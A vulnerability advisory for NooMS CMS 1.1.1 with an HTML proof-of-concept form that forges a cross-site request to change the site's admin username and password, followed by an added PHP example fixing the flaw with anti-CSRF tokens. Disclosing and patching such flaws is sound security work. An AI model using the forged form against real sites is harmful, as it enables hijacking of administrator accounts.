NooMS CMS 1.1.1 Cross Site Request Forgery

Type packetstorm
Reporter loneferret
Modified 2011-04-10T00:00:00


# NooMS CMS version 1.1.1 CSRF
# Bug Found: April 9th 2011
# Found by: loneferret (as far as I know anyway)
# Software Download Link:
# Nods to exploit-db Team
# Well, I didn't have much to do this morning so figured I'd try to see how
# long it would take me to find one of these. It's nothing to write home about.
# I mean...come on! Who would use a CMS named NooMS? This thing uses a MySQL
# database as well, wouldn't be surprised if there are other things to be found.
# But I need to get some chores done before the wife starts.
# Enjoy,
# loneferret
# p.s:
# I wanted to contact the creator, but his page (using NooMS) is
# blank... nothing there so.. sorry.
```html
<!-- PoC: the admin preference form accepts a cross-origin POST with no anti-CSRF token -->
<form action="http://[host]/admin.php" method="post">
<input type="hidden" name="op" value="pref">
<input type="hidden" name="action" value="edit">
Admin Username: <input type="text" size="20" name="admin_user" value=""><br>
Admin Password: <input type="text" size="20" name="admin_pwd" value=""><br>
Site Name: <input type="text" size="40" name="site_name" value=""><br>
Site URL: <input type="text" size="40" name="site_url" value=""><br>
Number of results per page: <input type="text" size="10" name="search_numr" value=""><br>
Lang: <input type="text" size="10" name="lang" value="en"><br>
Theme: <input type="text" name="template" value="default">
<input type="submit" value="change">
</form>
```
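The fix the advisory implies is a per-session synchronizer token on the preference-edit handler. The following is an added example, not NooMS code or the author's; the function names, the `$_SESSION` layout and the Origin check are assumptions about how such a handler could be written.

```php
<?php
// Added example: CSRF protection for a handler shaped like
// admin.php?op=pref&action=edit. Not NooMS code; names are assumptions.
session_start();

// One random token per session, embedded in every state-changing form.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only if the submitted token matches the session token (constant-time
// compare) and, when the browser sent Origin/Referer, it names our own host.
function csrf_check(string $our_host): bool {
    $sent = $_POST['csrf_token'] ?? '';
    $have = $_SESSION['csrf_token'] ?? '';
    if ($have === '' || !is_string($sent) || !hash_equals($have, $sent)) {
        return false;
    }
    $origin = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? '';
    if ($origin !== '' && parse_url($origin, PHP_URL_HOST) !== $our_host) {
        return false;
    }
    return true;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST'
        && ($_POST['op'] ?? '') === 'pref'
        && ($_POST['action'] ?? '') === 'edit') {
    // Strip any :port from Host before comparing against the Origin host.
    $our_host = parse_url('http://' . ($_SERVER['HTTP_HOST'] ?? ''), PHP_URL_HOST);
    if (!csrf_check((string) $our_host)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    // ... the existing admin_user / admin_pwd / site_name update runs here ...
}
?>
<form action="admin.php" method="post">
<input type="hidden" name="op" value="pref">
<input type="hidden" name="action" value="edit">
<input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
Admin Username: <input type="text" size="20" name="admin_user" value=""><br>
Admin Password: <input type="password" size="20" name="admin_pwd" value=""><br>
<input type="submit" value="change">
</form>
```

Issuing the session cookie with `SameSite=Lax` (via `session_set_cookie_params()` on PHP 7.3 or later) adds a second, independent layer, since a cross-site POST then arrives without the admin's session cookie at all.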